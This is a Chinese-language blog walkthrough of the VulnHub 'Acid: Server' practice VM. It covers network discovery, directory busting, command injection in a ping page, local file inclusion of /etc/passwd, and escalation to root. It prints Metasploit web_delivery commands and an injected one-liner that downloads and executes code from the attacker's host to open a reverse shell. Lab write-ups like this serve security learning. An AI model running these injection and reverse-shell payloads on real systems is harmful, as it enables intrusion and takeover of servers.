<!DOCTYPE html>












  


<html class="theme-next gemini use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2">

<link rel="stylesheet" href="/css/main.css?v=7.1.1">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.1.1">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.1.1">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.1.1">


  <link rel="mask-icon" href="/images/logo.svg?v=7.1.1" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '7.1.1',
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false,"dimmer":false},
    back2top: true,
    back2top_sidebar: true,
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="1. 查看IP地址由于不知道靶场的登录密码，所以需要使用其他工具获取IP 这里使用Kali自带的一个工具netdiscover">
<meta name="keywords" content="VulnHub">
<meta property="og:type" content="article">
<meta property="og:title" content="&#39;VulnHub Acid Server Walkthrough&#39;">
<meta property="og:url" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/index.html">
<meta property="og:site_name" content="Emerald Dream">
<meta property="og:description" content="1. 查看IP地址由于不知道靶场的登录密码，所以需要使用其他工具获取IP 这里使用Kali自带的一个工具netdiscover">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/01.01.netdiscover.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/02.01.nmap.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/02.02.visit.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/03.01.DirBuster.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/03.02.wow.jpg">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/03.03.MD5decode.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/03.05.DirBuster.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/03.06.Command.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/03.07.Ping_Result.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/03.08.Command_Inject.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/03.09.AnotherWay.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/03.10.acid_text.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/03.11.protected_page.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/03.12.form_js.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/03.13.google_result.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/03.14.GitHub_commits.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/03.15.Set_Up.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/03.16.Login.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/03.17.users.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/03.18.secrect.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/04.01.reverse_kunfu.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/04.02.shell.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/04.03.investigate.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/04.04.home.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/04.05.acid_file.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/04.06.download.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/04.07.WireShark.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/04.08.saman.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/04.09.Xshell.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/04.10.Kali.png">
<meta property="og:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/04.11.Falg.png">
<meta property="og:updated_time" content="2019-07-04T11:25:17.013Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="&#39;VulnHub Acid Server Walkthrough&#39;">
<meta name="twitter:description" content="1. 查看IP地址由于不知道靶场的登录密码，所以需要使用其他工具获取IP 这里使用Kali自带的一个工具netdiscover">
<meta name="twitter:image" content="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/01.01.netdiscover.png">





  
  
  <link rel="canonical" href="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>'VulnHub Acid Server Walkthrough' | Emerald Dream</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Emerald Dream</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>Home</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>Tags</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">

    
    
    
      
    

    

    <a href="/categories/" rel="section"><i class="menu-item-icon fa fa-fw fa-th"></i> <br>Categories</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Archives</a>

  </li>

      
      
    </ul>
  

  

  
</nav>



  



</div>
    </header>

    
  
  

  

  <a href="https://github.com/yourname" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewbox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"/><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"/><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"/></svg></a>



    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://chirec.github.io/2019/05/13/VulnHub-Acid-Server/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="chessur">
      <meta itemprop="description" content="Freedom as Autonomy">
      <meta itemprop="image" content="/images/cat.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Emerald Dream">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">'VulnHub Acid Server Walkthrough'

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              

              
                
              

              <time title="Created: 2019-05-13 22:09:09" itemprop="dateCreated datePublished" datetime="2019-05-13T22:09:09+08:00">2019-05-13</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Edited on</span>
                
                <time title="Modified: 2019-07-04 19:25:17" itemprop="dateModified" datetime="2019-07-04T19:25:17+08:00">2019-07-04</time>
              
            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/VulnHub/" itemprop="url" rel="index"><span itemprop="name">VulnHub</span></a></span>

                
                
              
            </span>
          

          
            
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="1-查看IP地址"><a href="#1-查看IP地址" class="headerlink" title="1. 查看IP地址"></a>1. 查看IP地址</h1><p>由于不知道靶场的登录密码，所以需要使用其他工具获取IP</p>
<p>这里使用Kali自带的一个工具netdiscover</p>
<a id="more"></a>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">Usage: netdiscover [-i device] [-r range | -l file | -p] [-m file] [-s time] [-n node] [-c count] [-f] [-d] [-S] [-P] [-c]</span><br><span class="line">  -i device: your network device</span><br><span class="line">  -r range: scan a given range instead of auto scan. 192.168.6.0/24,/16,/8</span><br><span class="line">  -l file: scan the list of ranges contained into the given file</span><br><span class="line">  -p passive mode: do not send anything, only sniff</span><br><span class="line">  -m file: scan the list of known MACs and host names</span><br><span class="line">  -F filter: Customize pcap filter expression (default: &quot;arp&quot;)</span><br><span class="line">  -s time: time to sleep between each arp request (milliseconds)</span><br><span class="line">  -n node: last ip octet used for scanning (from 2 to 253)</span><br><span class="line">  -c count: number of times to send each arp reques (for nets with packet loss)</span><br><span class="line">  -f enable fastmode scan, saves a lot of time, recommended for auto</span><br><span class="line">  -d ignore home config files for autoscan and fast mode</span><br><span class="line">  -S enable sleep time supression between each request (hardcore mode)</span><br><span class="line">  -P print results in a format suitable for parsing by another program</span><br><span class="line">  -N Do not print header. Only valid when -P is enabled.</span><br><span class="line">  -L in parsable output mode (-P), continue listening after the active scan is completed</span><br><span class="line"></span><br><span class="line">If -r, -l or -p are not enabled, netdiscover will scan for common lan addresses.</span><br></pre></td></tr></table></figure>
<p>执行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netdiscover -r 192.168.126.0/24</span><br></pre></td></tr></table></figure>
<p>查询VMware的Nat模式下的子网</p>
<img src="/2019/05/13/VulnHub-Acid-Server/01.01.netdiscover.png">
<p>找到了靶机的IP<code>192.168.126.161</code></p>
<h1 id="2-扫描靶机端口"><a href="#2-扫描靶机端口" class="headerlink" title="2. 扫描靶机端口"></a>2. 扫描靶机端口</h1><p>使用Nmap扫描靶机端口</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sS -T4 -sV -O -p- 192.168.126.161</span><br></pre></td></tr></table></figure>
<p>扫描结果</p>
<img src="/2019/05/13/VulnHub-Acid-Server/02.01.nmap.png">
<p>扫描发现靶机开放端口为<code>33447</code></p>
<p>访问<code>http://192.168.126.161:33447</code></p>
<img src="/2019/05/13/VulnHub-Acid-Server/02.02.visit.png">
<h1 id="3-Web"><a href="#3-Web" class="headerlink" title="3. Web"></a>3. Web</h1><p>网页的标题是<code>/Challenge</code>看起来是目录<br>先把地址丢到DirBuster里去跑</p>
<p>查看网页源代码，在末尾发现十六进制字符串<code>&lt;!--0x643239334c6d70775a773d3d--&gt;</code>，解码后发现是base64编码格式<code>d293LmpwZw==</code>，再经过base64解码发现是一个图片<code>wow.jpg</code>，尝试在主页访问图片，并没有这个图片</p>
<p>这时，查看DirBuster</p>
<img src="/2019/05/13/VulnHub-Acid-Server/03.01.DirBuster.png">
<p>发现标题确实是目录名<br>访问<code>/Challenge</code>，需要用邮箱和密码登录<br>继续访问扫描出来的目录，发现<code>cake.php</code>页面的标题也是目录名<code>/Magic_Box</code><br>将目录改为<code>/Challenge/Magic_Box</code>，继续进行目录扫描</p>
<p>在扫描结果里看到了/images目录，将wow.jpg放在里面打开</p>
<img src="/2019/05/13/VulnHub-Acid-Server/03.02.wow.jpg">
<p>使用WinHex打开图片，在末尾发现<code>;37:61:65:65:30:66:36:64:35:38:38:65:64:39:39:30:35:65:65:33:37:66:31:36:61:37:63:36:31:30:64:34</code><br>使用BurpSuite自带的Ascii Hex进行解码得到<code>7aee0f6d588ed9905ee37f16a7c610d4</code>，看起来像MD5加密后的字符串<br>将字符串丢到MD5解密</p>
<img src="/2019/05/13/VulnHub-Acid-Server/03.03.MD5decode.png">
<p>获得<code>63425</code>可能是密码，不过图片这条线就到这里结束了</p>
<p>再回去看DirBuster扫描结果</p>
<img src="/2019/05/13/VulnHub-Acid-Server/03.05.DirBuster.png">
<p>访问<code>/Challenge/Magic_Box/command.php</code></p>
<img src="/2019/05/13/VulnHub-Acid-Server/03.06.Command.png">
<p>是一个可以执行<code>ping</code>命令的页面，输入Kali的IP地址测试一下</p>
<p>发现页面没有发生变化，查看页面源代码后发现结果在上方空白处</p>
<img src="/2019/05/13/VulnHub-Acid-Server/03.07.Ping_Result.png">
<p>尝试命令执行注入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">192.168.126.126;ls</span><br></pre></td></tr></table></figure>
<img src="/2019/05/13/VulnHub-Acid-Server/03.08.Command_Inject.png">
<p>存在命令执行注入，可以反弹Shell进一步渗透</p>
<h2 id="3-1-另一种思路"><a href="#3-1-另一种思路" class="headerlink" title="3.1 另一种思路"></a>3.1 另一种思路</h2><p>对于<code>cake.php</code>页面还有另一种获取方法，From:<a href="https://jasperandgarrison.wordpress.com/2017/04/19/walkthrough-acid-server/" target="_blank" rel="noopener">CTF WALKTHROUGH – ACID: SERVER (VULNHUB)</a></p>
<p>在<code>/Challenge/index.php</code>页面的源代码中，可以发现<code>&lt;!DOCTYPE gkg.qvpn html&gt;</code></p>
<img src="/2019/05/13/VulnHub-Acid-Server/03.09.AnotherWay.png">
<p>使用ROT13解密得到<code>txt.dica</code>，反过来是<code>acid.txt</code>，访问<code>/Challenge/acid.txt</code></p>
<img src="/2019/05/13/VulnHub-Acid-Server/03.10.acid_text.png">
<p>又获得一个页面<code>protected_page.php</code>，打开之后发现没有权限访问</p>
<img src="/2019/05/13/VulnHub-Acid-Server/03.11.protected_page.png">
<p>再回到<code>/Challenge/index.php</code>页面的源代码中，可以找到<code>js/forms.js</code>打开发现在文件中有版权信息</p>
<img src="/2019/05/13/VulnHub-Acid-Server/03.12.form_js.png">
<p>使用Google搜索<code>peredur.net form_js</code></p>
<p>第一条就是该项目在GitHub上的仓库</p>
<img src="/2019/05/13/VulnHub-Acid-Server/03.13.google_result.png">
<p>进去之后，发现这是一个已经很久没有更新的项目，并且在Readme里写了作者没有时间更新，希望有人接手的信息，这些信息对我们没有什么用。在<code>commits</code>里查看Readme的更新</p>
<img src="/2019/05/13/VulnHub-Acid-Server/03.14.GitHub_commits.png">
<p>在<code>Modified the README.md file</code>中可以看到初始用户名和密码</p>
<img src="/2019/05/13/VulnHub-Acid-Server/03.15.Set_Up.png">
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Username	: test_user </span><br><span class="line">Email		: test@example.com </span><br><span class="line">Password	: 6ZaxN2Vzm9NUJT2y</span><br></pre></td></tr></table></figure>
<p>使用这组密码登录<code>Challenge/index.php</code>，成功登录</p>
<img src="/2019/05/13/VulnHub-Acid-Server/03.16.Login.png">
<p>就是之前发现的<code>protected_page.php</code><br>页面提示点击这里继续深入</p>
<p>点击之后，发现跳转到了<code>/Challenge/include.php</code>页面，页面自带本地包含功能，输入<code>/etc/passwd</code>，页面没有变化，查看源代码可以发现包含成功</p>
<img src="/2019/05/13/VulnHub-Acid-Server/03.17.users.png">
<p>可以看到<code>acid</code>和<code>saman</code>的用户ID</p>
<p>在源代码的最下面依然存在这一行被注释掉的十六进制字符串<code>&lt;!--0x5933566a4c6e4a34626e413d--&gt;</code></p>
<img src="/2019/05/13/VulnHub-Acid-Server/03.18.secrect.png">
<p>按照之前的解密方式，解密获得<code>cuc.rxnp</code>，再经过ROT13解密获得<code>php.ekac</code>，反过来是<code>cake.php</code>，后续操作和第一种方法一样</p>
<h1 id="4-渗透"><a href="#4-渗透" class="headerlink" title="4. 渗透"></a>4. 渗透</h1><p><code>Challenge/Magic_Box/command.php</code>页面的标题是<code>Reverse Kunfu</code>，提示反弹Shell</p>
<p>使用MSF反弹Shell</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">msf5 &gt; use exploit/multi/script/web_delivery</span><br><span class="line">msf5 exploit(multi/script/web_delivery) &gt; set lhost 192.168.126.126</span><br><span class="line">lhost =&gt; 192.168.126.126</span><br><span class="line">msf5 exploit(multi/script/web_delivery) &gt; set lport 8126</span><br><span class="line">lport =&gt; 8126</span><br><span class="line">msf5 exploit(multi/script/web_delivery) &gt; set srvport 7777</span><br><span class="line">srvport =&gt; 7777</span><br><span class="line">msf5 exploit(multi/script/web_delivery) &gt; set payload python/meterpreter/reverse_tcp</span><br><span class="line">payload =&gt; python/meterpreter/reverse_tcp</span><br><span class="line">msf5 exploit(multi/script/web_delivery) &gt; run</span><br></pre></td></tr></table></figure>
<p>PHP</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php -d allow_url_fopen=true -r &quot;eval(file_get_contents(&apos;http://192.168.126.126:2626/qNRqp3NMPx&apos;));&quot;</span><br></pre></td></tr></table></figure>
<p>python</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c &quot;import sys;u=__import__(&apos;urllib&apos;+&#123;2:&apos;&apos;,3:&apos;.request&apos;&#125;[sys.version_info[0]],fromlist=(&apos;urlopen&apos;,));r=u.urlopen(&apos;http://192.168.126.126:7777/aSEchhTZ&apos;);exec(r.read());&quot;</span><br></pre></td></tr></table></figure>
<p>在<code>Challenge/Magic_Box/command.php</code>页面输入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">;python -c &quot;import sys;u=__import__(&apos;urllib&apos;+&#123;2:&apos;&apos;,3:&apos;.request&apos;&#125;[sys.version_info[0]],fromlist=(&apos;urlopen&apos;,));r=u.urlopen(&apos;http://192.168.126.126:7777/aSEchhTZ&apos;);exec(r.read());&quot;</span><br></pre></td></tr></table></figure>
<p>Kali中MSF获得Shell</p>
<img src="/2019/05/13/VulnHub-Acid-Server/04.01.reverse_kunfu.png">
<p>查看id</p>
<img src="/2019/05/13/VulnHub-Acid-Server/04.02.shell.png">
<p>接下来查找敏感信息，看能否提升权限</p>
<p>在根目录下发现一个<code>s.bin</code>目录，里面有一个<code>investigate.php</code>的文件，查看其内容</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">echo &quot;Now you have to behave like an investigator to catch the culprit\n&quot;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<img src="/2019/05/13/VulnHub-Acid-Server/04.03.investigate.png">
<p>查看root,acid,saman的家目录</p>
<img src="/2019/05/13/VulnHub-Acid-Server/04.04.home.png">
<p>在acid的家目录加看到一个名为<code>.sudo_as_admin_successful</code>大小为0的文件，提示普通用户可以切换为root用户</p>
<p>查找acid这个用户的文件来获取他的密码来切换账户</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -user acid 2&gt;/dev/null</span><br></pre></td></tr></table></figure>
<img src="/2019/05/13/VulnHub-Acid-Server/04.05.acid_file.png">
<p>第一个是<code>hint.pcapng</code>文件，是一个流量包<br>使用python搭建Server下载下来进行流量分析</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -m SimpleHTTPServer 12600</span><br></pre></td></tr></table></figure>
<img src="/2019/05/13/VulnHub-Acid-Server/04.06.download.png">
<p>使用WireShark打开，是一个由6400条记录的流量包</p>
<p>分析TCP协议，可以发现一段明文传输的对话</p>
<img src="/2019/05/13/VulnHub-Acid-Server/04.07.WireShark.png">
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">heya</span><br><span class="line">     hello</span><br><span class="line">What was the name of the Culprit???</span><br><span class="line">     saman and nowadays he&apos;s known by the alias of 1337hax0r</span><br><span class="line">oh Fuck Great Now, we gonna Catch Him Soon :D</span><br><span class="line">     Yes We have to !! The mad bomber is on a rage</span><br><span class="line">Ohkcya</span><br><span class="line">     Over and Out</span><br></pre></td></tr></table></figure>
<p>找到了<code>saman</code>用户，以及他的别名<code>1337hax0r</code>，猜测这可能是他的密码</p>
<img src="/2019/05/13/VulnHub-Acid-Server/04.08.saman.png">
<p>尝试切换root<code>sudo su</code></p>
<img src="/2019/05/13/VulnHub-Acid-Server/04.09.Xshell.png">
<p>查找资料发现是ssh连接的原因，使用Kali切换</p>
<img src="/2019/05/13/VulnHub-Acid-Server/04.10.Kali.png">
<p>查看Flag</p>
<img src="/2019/05/13/VulnHub-Acid-Server/04.11.Falg.png">
<h1 id="5-总结"><a href="#5-总结" class="headerlink" title="5. 总结"></a>5. 总结</h1><p>1.netdiscover使用<br>2.多看页面源码，注意源码长度<br>3.查找用户文件<code>find / -user 2&gt;/dev/null</code><br>4.MSF反弹Shell模块<code>exploit/multi/script/web_delivery</code><br>5.尝试查找初始用户和初始密码</p>
<h1 id="6-参考"><a href="#6-参考" class="headerlink" title="6. 参考"></a>6. 参考</h1><p>[1] <a href="https://www.vulnhub.com/entry/acid-server,125/" target="_blank" rel="noopener">Acid: Server</a></p>
<p>[2] <a href="https://jasperandgarrison.wordpress.com/2017/04/19/walkthrough-acid-server/" target="_blank" rel="noopener">CTF WALKTHROUGH – ACID: SERVER (VULNHUB)</a></p>
<p>[2] <a href="https://www.jianshu.com/p/674a5e88d323" target="_blank" rel="noopener">2018-09-14-Vulnhub渗透测试实战writeup(1)</a></p>
<p>[3] <a href="https://www.cnblogs.com/zhuxr/p/9996426.html" target="_blank" rel="noopener">Vulnhub Acid</a></p>

      
    </div>

    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/VulnHub/" rel="tag"># VulnHub</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/05/13/Upload-Labs/" rel="next" title="'Upload Labs'">
                <i class="fa fa-chevron-left"></i> 'Upload Labs'
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/05/14/VulnHub-Quaoar/" rel="prev" title="'VulnHub Quaoar Walkthrough'">
                'VulnHub Quaoar Walkthrough' <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/cat.jpg" alt="chessur">
            
              <p class="site-author-name" itemprop="name">chessur</p>
              <div class="site-description motion-element" itemprop="description">Freedom as Autonomy</div>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">35</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  
                    
                      <a href="/categories/">
                    
                  
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">6</span>
                    <span class="site-state-item-name">categories</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  
                    
                      <a href="/tags/">
                    
                  
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">6</span>
                    <span class="site-state-item-name">tags</span>
                  </a>
                </div>
              
            </nav>
          

          

          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://github.com/ChireC" title="GitHub &rarr; https://github.com/ChireC" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
                </span>
              
            </div>
          

          

          
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
